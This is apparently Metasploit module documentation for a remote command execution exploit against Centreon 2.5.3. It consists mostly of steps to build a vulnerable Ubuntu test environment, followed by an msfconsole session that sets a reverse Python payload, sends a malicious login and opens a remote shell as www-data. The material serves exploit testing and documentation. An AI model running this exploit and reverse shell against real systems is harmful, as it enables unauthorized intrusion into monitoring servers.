## Vulnerable Application 1. [Exploit-db](https://www.exploit-db.com/apps/bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz) 2. Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts) ### Creating A Testing Environment Creating a testing environment for this application contained many steps, so I figured I would document the process here. 1. Create a fresh install of Ubuntu 16.04. I used a LAMP install. My user was `centreon` 2. Install php5.6 [askubuntu](http://askubuntu.com/questions/756181/installing-php-5-6-on-xenial-16-04) ``` sudo apt purge `dpkg -l | grep php| awk '{print $2}' |tr "\n" " "` sudo add-apt-repository ppa:ondrej/php sudo apt-get install php5.6 sudo apt-get install php5.6-mbstring php5.6-mcrypt php5.6-mysql php5.6-xml php5.6-gd php5.6-ldap php5.6-sqlite3 sudo apt-get install build-essential cmake librrd-dev libqt4-dev libqt4-sql-mysql libgnutls28-dev python-minimal sudo apt-get install tofrodos bsd-mailx lsb-release mysql-server libmysqlclient-dev apache2 php-pear rrdtool librrds-perl libconfig-inifiles-perl libcrypt-des-perl libdigest-hmac-perl libgd-gd2-perl snmp snmpd libnet-snmp-perl libsnmp-perl select OK select No Configuration sudo apt-get install snmp-mibs-downloader ``` 3. Enable php5.6 in Apache with `a2enmod`, disable php7.0 with `a2dismod` ``` a2enmod php5.6 a2dismod php7.0 ``` 4. Restart apache with `sudo apache2ctl restart` 5. Install [Nagios Plugins](https://assets.nagios.com/downloads/nagioscore/docs/nagioscore/3/en/quickstart-ubuntu.html) starting at step 6. The plugins link is broken, utilize [nagios-plugins-2.1.1.tar.gz](http://www.nagios-plugins.org/download/nagios-plugins-2.1.1.tar.gz) instead ``` wget http://www.nagios-plugins.org/download/nagios-plugins-2.1.1.tar.gz tar xvf nagios-plugins-2.1.1.tar.gz cd nagios-plugins-2.1.1/ ./configure make sudo make install ``` 5.1 If during make, you get an sslv3 method not found error (https://support.nagios.com/forum/viewtopic.php?f=35&t=36601&p=168235&hilit=SSLv3#p168235) ``` --- plugins/sslutils.c.orig 2016-01-14 20:02:06.419867000 +0100 +++ plugins/sslutils.c 2016-01-14 20:01:36.091492000 +0100 @@ -70,8 +70,13 @@ #endif break; case 3: /* SSLv3 protocol */ +#if defined(OPENSSL_NO_SSL3) + printf(("%s\n", _("CRITICAL - SSL protocol version 3 is not supported by your SSL library."))); + return STATE_CRITICAL; +#else method = SSLv3_client_method(); ssl_options = SSL_OP_NO_SSLv2 | SSL_OP_NO_TLSv1; +#endif break; default: /* Unsupported */ printf("%s\n", _("CRITICAL - Unsupported SSL protocol version.")); ``` 6. Install [Centreon clib](https://documentation.centreon.com/docs/centreon-clib/en/latest/installation/index.html) ``` cd ~ git clone https://github.com/centreon/centreon-clib cd centreon-clib/build cmake . make sudo make install ``` 7. Install [Centreon Broker](https://documentation.centreon.com/docs/centreon-broker/en/2.11/installation/index.html) ``` cd ~ git clone https://github.com/centreon/centreon-broker cd centreon-broker/build/ cmake -DWITH_STARTUP_DIR=/etc/init.d -DWITH_STARTUP_SCRIPT=sysv . make sudo make install ``` 8. Install [Centreon Engine](https://documentation.centreon.com/docs/centreon-engine/en/latest/installation/index.html) ``` cd ~ git clone https://github.com/centreon/centreon-engine cd centreon-engine/build/ cmake -DWITH_STARTUP_DIR=/etc/init.d -DWITH_STARTUP_SCRIPT=sysv . make sudo make install ``` 9. Now install [Centreon Web](https://documentation.centreon.com/docs/centreon/en/2.5.x/installation/from_sources.html) but only the command line portion. ``` sudo mkdir /var/log/centreon-engine cd ~ sudo pear install XML_RPC-1.4.5 (may need to install php-xml) wget https://www.exploit-db.com/apps/bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz tar vxf bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz cd centreon-2.5.3 sudo ./install.sh -i q y y y y y y y y y y centreon /var/log/centreon-engine /home/centreon/nagios-plugins-2.1.1/plugins /etc/init.d/centengine /usr/local/bin/centengine /usr/local/etc/ /usr/local/etc/ /etc/init.d/centengine y y y y y y y y y y y ``` 10. Fix apache config ``` sudo cp /etc/apache2/conf.d/centreon.conf /etc/apache2/conf-available/ sudo sed -i 's/Order allow,deny/Require all granted/' /etc/apache2/conf-available/centreon.conf sudo sed -i 's/allow from all//' /etc/apache2/conf-available/centreon.conf sudo a2enconf centreon sudo service apache2 reload ``` 11. Configure via website. Browse to /centreon ``` next next select centreon-engine /usr/local/lib/centreon-engine /usr/local/bin/centenginestats /usr/local/lib/centreon-engine /usr/local/lib/centreon-engine /usr/local/lib/centreon-engine next select centreon-broker /usr/local/lib/centreon-broker /usr/local/lib/cbmod.so /usr/local/lib/centreon-broker /usr/local/lib/centreon-broker /usr/local/lib/centreon-broker next Pick whatever details about your user you want, next Fill in mysql Root password, next next next finish ``` ## Verification Steps 1. Install the application 2. Start msfconsole 3. Do: `use exploit/linux/http/centreon_useralias_exec` 4. Do: `set payload` 5. Do: `set rhost` 6. Do: `check` 7. Do: ```run``` 8. You should get a shell. ## Scenarios Just a standard run. msf > use exploit/linux/http/centreon_useralias_exec msf exploit(centreon_useralias_exec) > set payload cmd/unix/reverse_python payload => cmd/unix/reverse_python msf exploit(centreon_useralias_exec) > set lhost 192.168.2.229 lhost => 192.168.2.229 msf exploit(centreon_useralias_exec) > set rhost 192.168.2.85 rhost => 192.168.2.85 msf exploit(centreon_useralias_exec) > set verbose true verbose => true msf exploit(centreon_useralias_exec) > check [+] Version Detected: 2.5.3 [*] 192.168.2.85:80 The target appears to be vulnerable. msf exploit(centreon_useralias_exec) > exploit [*] Started reverse TCP handler on 192.168.2.229:4444 [*] Sending malicious login [*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.85:36792) at 2016-06-11 20:44:57 -0400 whoami www-data uname -a Linux centreon 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux ```